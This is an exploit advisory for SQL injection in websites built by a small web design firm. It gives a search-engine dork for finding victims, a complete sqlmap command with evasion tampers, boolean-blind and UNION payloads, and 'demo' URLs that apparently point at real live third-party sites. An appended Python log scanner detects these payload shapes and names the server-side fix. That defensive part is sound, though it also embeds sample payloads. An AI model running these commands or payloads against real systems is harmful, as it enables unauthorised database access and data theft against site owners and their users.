
ArkansasWeb.com SQL Injection Vulnerability


[CODE]#################################################################################
# Exploit Title: ArkansasWeb.com SQL Injection Vulnerability
# Author : Sipahiler & TURKZ.org
# Google Dork : intext:Web Design and Hosting by ArkansasWeb.com  & inurl:id=
# Vendor Home: https://www.arkansasweb.com/
# Tested on : Kali Linux 2017.1 Chrome, Firefox
# Date : 2017-10-11
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/     
#################################################################################

Tutorial :
[+] Dorking in Google or other search engine
[+] Open Target
[+] Sqlmap and manual

Command : root@TrazeR:~# sqlmap --random-agent --technique=BEUS  --threads=10 --no-cast  --tamper=space2comment,randomcase --timeout=10 --level=3 --risk=3  --batch  --dbs -u "http://www.employment4u.com/jobdescription.php?id=254"

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=254 AND 4058=4058

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=254 UNION ALL SELECT CONCAT(0x717a717171,0x4272554e774d6557774d6a714b694d697a4b43426f78524176614f626c7a4c6d75686359514d4a55,0x7171716b71),NULL,NULL,NULL,NULL,NULL,NULL#


Demo :
http://www.employment4u.com/jobdescription.php?id=254
http://www.ridgewoodtimbercorp.com/property.php?id=331

Greet'Zzz : Darkcod3r & EfendiBey & Atabey & Odesa & TrazeR & Zer0Day & AKA_1NF4z & Kutluhan & Alianz & By_Dadas & S1R & Seytan6161 [/CODE]
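
A defender-side check for the request shapes reported above, as an added example that is not part of the original advisory: it scans web access-log lines for the numeric `id` parameter and flags the boolean-based and UNION payload forms, first undoing the `space2comment` and `randomcase` tampers named in the command. The log lines, client addresses and function names are constructed for illustration; only the parameter name and script paths come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Payload families reported in the advisory for the numeric `id` parameter.
UNION_RE = re.compile(r"\bunion\s+(all\s+)?select\b")
BOOL_RE = re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+\b")
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines in combined-log style (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Oct/2017:10:00:01 +0000] "GET /jobdescription.php?id=254 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [11/Oct/2017:10:00:05 +0000] "GET /jobdescription.php?id=254/**/aNd/**/4058=4058 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [11/Oct/2017:10:00:06 +0000] "GET /jobdescription.php?id=254%20uNiOn%20AlL%20sElEcT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL%23 HTTP/1.1" 200 5301',
    '203.0.113.9 - - [11/Oct/2017:10:00:09 +0000] "GET /property.php?id=331%27 HTTP/1.1" 500 312',
]


def normalise(value):
    """Undo space2comment (/**/ for spaces) and randomcase before matching."""
    return re.sub(r"\s+", " ", COMMENT_RE.sub(" ", value)).lower()


def classify(value):
    """Return findings for one value of a parameter expected to be an integer."""
    text = normalise(value)
    findings = []
    if UNION_RE.search(text):
        findings.append("union-select")
    if BOOL_RE.search(text):
        findings.append("boolean-comparison")
    if not findings and not text.strip().isdigit():
        findings.append("non-numeric-id")
    return findings


def scan(lines, param="id"):
    """Yield (line_number, findings) for log lines with a suspicious `param`."""
    for n, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qsl percent-decodes and splits each pair on the first '=' only.
        for key, value in parse_qsl(urlsplit(match.group(1)).query, keep_blank_values=True):
            hits = classify(value) if key == param else []
            if hits:
                yield n, hits


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, hits)
```

Log matching of this kind only detects probing; the fix on the server side is to validate `id` as an integer and pass it to the database through a parameterised query.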